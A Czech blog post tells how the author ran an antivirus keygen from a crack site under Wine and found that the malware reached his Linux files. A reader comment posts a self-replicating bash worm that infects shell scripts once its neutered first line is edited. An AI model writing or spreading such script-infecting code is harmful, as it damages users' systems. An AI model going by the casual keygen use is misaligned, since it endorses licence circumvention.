Jednou za několik let se světem prožene zpráva, že už nejen pro Windows, ale i pro Linux je tu opravdový virus. V linuxovém světě je to samozřejmě událost o které se všude píše, opravují se chyby v jádře, aby ona potvůrka mohla vůbec fungovat a i tak stejně brzy upadne v zapomnění.
Antiviry pro Linux tu sice jsou a sám jsem na několik serverů Esetí Antivirus Protection for Linux, BSD, and Solaris instaloval, ale spíš jen proto, že to tak nějak vyplynulo z licenční politiky. Od učitého počtu licencí NOD 32 pro Windows stanice je tu možnost mít i tohoto serverového klienta zdarma nebo za pakatel, teď nevím přesně, a i když firma má servery výhradně na Linuxu, tak proč tím tu sambu nepohlídat?
Dnes jsem měl trošku „rizikový styk“ se světem Windows. Měl jsem návštěvu s notebookem s XPčky, že to prý pořád hlásí „nějakou chybu“. No aby ne. Už ani nepamatuji uživatele, který si s problémem neví rády, aby problém popsal jinak než „nějaká chyba“, ale to jsou detaily. Po nabootování se ukázalo, že onou nějakou chybou je upozornění Avast Home Edition, že mu v prosinci vypršela licence a tudíž není dále aktualizován. Tato verze Avastu je zdarma pro domácí nekomerční použití, pouze je potřeba jednou za rok absolvovat registrační proceduru za účelem získání nového klíče. Vyplnil jsem tedy formulář a dočetl se, že mám přijde klíč mailem do 24 hodin poštou. Jelikož klíč nepřicházel už dobrou půlhodinu a nejednalo se o sličnou slečnu, kterou bych rád zdržel maximálně dlouho, zavzpomínal jsem, že kdysi fungovalo něco jako as… (kdo ví ten ví a kdo neví, ať hledá jinde), tedy docela „pěkný“ vyhledávač cracků, sériových čísel, keygenů a podobně. Řekl jsem si, že zatím tam dám cizí klíč a hned jak přijde ten zaregistrovaný, tak to změním.
S klíčem jsem měl problém, kdo by taky kradl něco co je zdarma?, ale narazil jsem na keygen. Když už ho někdo psal pro komerční profi verzi, tak přidal možnost vygenerovat klíč i pro Home a já měl „vyhráno“. Na XP notebooku jsem to spouštět raději nechtěl, tak jsem zkusil Wine a během chvilky jsem měl klíč. Jen co jsem ho zadal, tak přisel mailem i ten legitimní, ale to už tak chodí. Já zas změnil klíč, návštěva odešla, smazal jsem pro klid duše ~/.wine a bral to jako uzavřenou věc.
Po čase jsem si vzpomněl, že jsem onehdy viděl na nějaké Win-orientovaném serveru zmínku o službě, která osahá požadovaný soubor a napíše status. Můj AvastKeygen.exe nezklamal a 59% procent antivirů a podobných skenerů potvůrku detekovalo.
Že mi win32 binárka asi příliš neuškodí mi bylo jasné, ale stejně jsem byl zvědavý, kde se všude zavrtala. Na další licenční vroubek v podobě již zmiňovaného linuxového Eset antiviru jsem neměl náladu ani krátkodobě a navíc u sebe nemám žádné klíče a ani soubory z certifikáty, takže linuxový Esetí antivir odpadl. Zkoušet něco nového pro Linux se mi nechtělo a tak jsem znovu vrátil k Wine. Nahodil jsem Internet Explorer, ano Visty mám vnuceny Lenovem, tedy legálně a tak můžu použít i ten Internet Explorer. Tentokrát jsem pro zajímavost zkusil ESET Online Scanner.
Mé „obavy“ se naplnily, respektive potvůrka nezklamala a „utekla“ z Wine. Ono to tedy nebylo až tak složité, když celý / byl k dispozici jako Z: a ~ pro jistotu ještě jednou, ale i tak mne to trošku překvapilo. Skener nezklamal, potvory našel a smazal. Bohužel jsem si nevšil kde všude byly.
V mém případě se nic nestalo a celé to bylo spíš jako zpestření všedního odpoledne, ale jak je vidět, ani Wine není vždy ten nejlepší nápad. Zatím mi šlo jen o to, aby abch něměl na disku něco závadného, co se nějakým způsobem dostane do ruky někomu dalšímu, třeba autorun na přiopojeném flashdisku, oblast sdílená sambou a podobně. Doba Linux virů ještě nenastala a díky pravidelným aktualiazcím a zatím velmi nadprůěrnému povědomí jeho uživatelů asi jen tak nenastane, nicméně není dobré si zbytečně zahrávat a i taktéž skenereny diskového uložiiště svůj význam mají.
Chcete linuxovej vir? Uz je to nakou dobu co sem ze srandy (a abych se trochu naucil bash) napsal tohle:
#!/bin/bash
# Harvie's ultimate bash worm ;P
# This absolutely SUX, but -W0W- i've learned bash basix while writing it!
# Protected against 31337 script-kiddies -edit-first-line-...
# You can gzexe this script, but add the H000KED comment at end of some line...
# Now it's just spreading, it's simple to add anything else...
# Copyright = a+rwx; No warranty, responsibility, etc... ;D
for i in $( find /dev/null 2> /dev/null | grep -i "\.bash\$\|\.sh\$" ); do #H000KED
if ( fgrep "\#H000KED" $i > /dev/null ); then
echo Already infected: $i #Debug only
continue #H000KED
fi #H000KED
echo >> $i #H000KED
cat $0 | grep \#H000KED >> $i
echo Newly infected: $i #Debug only
done #H000KED
> díky pravidelným aktualiazcím a zatím velmi nadprůěrnému povědomí jeho uživatelů
Je to spíš tento postoj, který přispívá u uživatelů Linuxu k falešnému pocitu bezpečnosti.
Nevím, jak Vám pravidelné aktualizace pomůžou proti tomu co jste udělal, tj. úmyslně spustil škodlivý program.
Nadprůměrné povědomí uživatelů Linuxu v otázkách zodpovědného používání PC je velmi diskutabilní.
Technologické zabezpečení je ve většině Linuxových distribucí na bodu mrazu. (Používáte na desktopu SELinux nebo jiný MAC systém?)
Jediná výhoda Linuxu je v otevřenosti kódu, tj. relativně jednoduššímu auditu a včasném řešení kritických incidentů.
Autor pracuje ve společnosti spravující počítačové sítě a používá Gentoo. Má rád otevřená řešení, pořádek v systému a sklenici vychlazeného piva.
Přečteno 29 063×
Přečteno 16 571×
Přečteno 13 485×
Přečteno 12 759×
Přečteno 10 757×